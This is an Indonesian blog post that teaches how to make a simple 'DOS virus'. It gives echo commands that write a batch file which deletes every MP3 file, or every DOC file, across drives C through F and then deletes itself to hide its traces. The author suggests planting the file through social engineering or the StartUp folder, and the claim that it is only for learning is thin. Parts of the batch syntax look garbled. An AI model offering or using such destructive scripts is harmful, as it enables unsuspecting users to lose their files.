Wellcome

Foto saya
Seorang yang suka akan tantangan

Rabu, 28 Juli 2010

Cara Membuat Virus DOS





Mau jadi Virus EnGineering..?????




Sebenarnya Mr'Ratz maniak membahas tema yang satu ini. Mr'Ratz posting hanya untuk pembelajaran kepada anda bahwa virus sesederhana apapun dapat mengakibatkan kerugian yang cukup besar Karena cenderung bersifat "merusak". oleh karena i2, Mr'Ratz akan menjelaskan bagaimana cara membuat Virus yg sederhana tapi mematikan alam artikel ini.
Ada banyak cara untuk membuat virus, salah satunya adalah dengan "DOS".

Mr'Ratz hanya akan memberikan sebuah contoh sangat sederhana dalam pembuatan virus. Efeknya akan menghapus file yang ber extensi "MP3" yang ada dalam komputer. Sebenarnya Mr'Ratz pernah melihat sebuah virus penghapus MP3 yang dibuat menggunakan Visual Basic, tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu menggunakan banyak-banyak source code. Anda bisa membuat virus sejenis hanya dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga bisa mengkreasikannya untuk melakukan aksi delete jenis file lainnya, cuma dengan menggantikan ekstensi file....hehehehehe

Anda juga bisa memodifikasi untuk menghapus semua file MP3 dalam seluruh drive atau hanya dalam folder tertentu. ini step by step nya :

  • Yang perlu Anda ketikkan dalam DOS adalah: echo for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdos.bat maka akan muncul seekor virus yang bernama virusdos.bat dalam folder yang aktif.
  • Untuk menjalankannya, Mr'Ratz serahkan kepada Anda. Apakah mau menggunakan Social Engineering, dipasang di StartUp. Semua itu urusan Anda. Mr'Ratz hanya mengajari cara membuatnya Mr'Ratz. Sebagai contoh, Mr'Ratz langsung mengaktifkan file virusvirusdos.bat tersebut.
  • Perhatikan, sekarang virus itu telah bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak.

Maaf ya, Mr'Ratz cuma memberikan satu itu saja. Untuk model-model
lainnya, pelajari sendiri.......heheheheheh......... Sebagai sedikit bonus, apabila Anda berniat memodifikasi supaya virus tersebut dapat menghapus dalam semua drive, bentuk
syntax-nya adalah:


  • echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdos.bat
  • Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3.
  • Sekarang apabila berniat jenis file tertentu, katakanlah file dokumen (DOC), syntax-nya menjadi: echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdos.bat

Yah, pokoknya pintar-pintar Anda-lah. Saya sangat senang main-main
dengan virus. Jadi, sudah segitu aja dulu ya......... nati disambung lagi yg lebih A-Extream........hehehehhehe

Salam Mr'Ratz





Tidak ada komentar:

Posting Komentar